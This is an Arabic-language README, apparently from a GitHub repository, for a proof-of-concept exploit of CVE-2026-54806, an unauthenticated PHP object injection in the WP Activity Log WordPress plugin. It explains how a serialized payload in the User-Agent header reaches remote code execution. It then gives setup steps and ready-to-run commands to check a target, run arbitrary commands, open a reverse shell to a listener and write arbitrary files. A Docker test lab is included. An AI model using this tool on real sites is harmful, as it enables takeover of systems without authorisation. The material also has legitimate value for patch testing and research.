
حقن كائنات PHP بدون مصادقة يؤدي إلى تنفيذ التعليمات البرمجية عن بُعد (RCE) في WP Activity Log <= 5.6.3.1 (CVE-2026-54806)
CVE-2026-54806 هي ثغرة حرجة (CVSS 9.8) من نوع PHP Object Injection غير مصادق عليها في إضافة WordPress الخاصة بـ WP Activity Log (wp-security-audit-log) من Melapress. يمكن لمهاجم غير مصادَق حقن كائنات PHP مُسلسَلة عبر ترويسة User-Agent في أي طلب يؤدي إلى تسجيل حدث (على سبيل المثال، فشل تسجيل الدخول). يتم تخزين الحمولة المحقونة في قاعدة البيانات وإلغاء تسلسلها دون قيود عندما يزور المدير لوحة تحكم WordPress، مما يؤدي إلى تنفيذ تعليمات برمجية عن بُعد بشكل أعمى (blind RCE) دون إرجاع أي مخرجات إلى المهاجم.
الإضافة المتأثرة: WP Activity Log <= 5.6.3.1 (تم الإصلاح في 5.6.4)
المطلوب لتفعيل RCE: WordPress 6.4.0 - 6.4.1 — يستخدم هذا الـ PoC أداة WP_HTML_Token gadget، وهي سلسلة نواة WP الوحيدة التي تحتوي على خصائص عامة بالكامل، وتنجو من sanitize_text_field() وتناسب حد العمود البالغ 255 حرفًا.
--check--command--shell--write-filegit clone https://github.com/joshuavanderpoll/CVE-2026-54806.git
cd CVE-2026-54806
python3 -m venv .venv
source .venv/bin/activate
pip3 install -r requirements.txt
git clone https://github.com/joshuavanderpoll/CVE-2026-54806.git
cd CVE-2026-54806
python3 -m venv .venv
.venv\Scripts\activate
pip3 install -r requirements.txt
python3 cve-2026-54806.py -t <target> --check
python3 cve-2026-54806.py -t <target> --command <cmd>
python3 cve-2026-54806.py -t <target> --shell --lhost <ip> --lport <port>
python3 cve-2026-54806.py -t <target> --write-file <content> <path>
مختبر مكتفٍ بذاته مع WordPress 6.4.1 + WP Activity Log 5.6.3.1. راجع DOCKER.md للتفاصيل.
cd docker
docker compose up -d
python3 cve-2026-54806.py -t http://localhost:8080 --check
يتضمن المختبر admin-bot يزور لوحة التحكم كل 60 ثانية، لذلك تُنفَّذ الحمولات المحقونة تلقائيًا — دون الحاجة إلى أي تفاعل يدوي.
تُقدَّم هذه الأداة لأغراض تعليمية وبحثية فقط. لا يتحمل المنشئ أي مسؤولية عن أي إساءة استخدام أو ضرر ناتج عن هذه الأداة.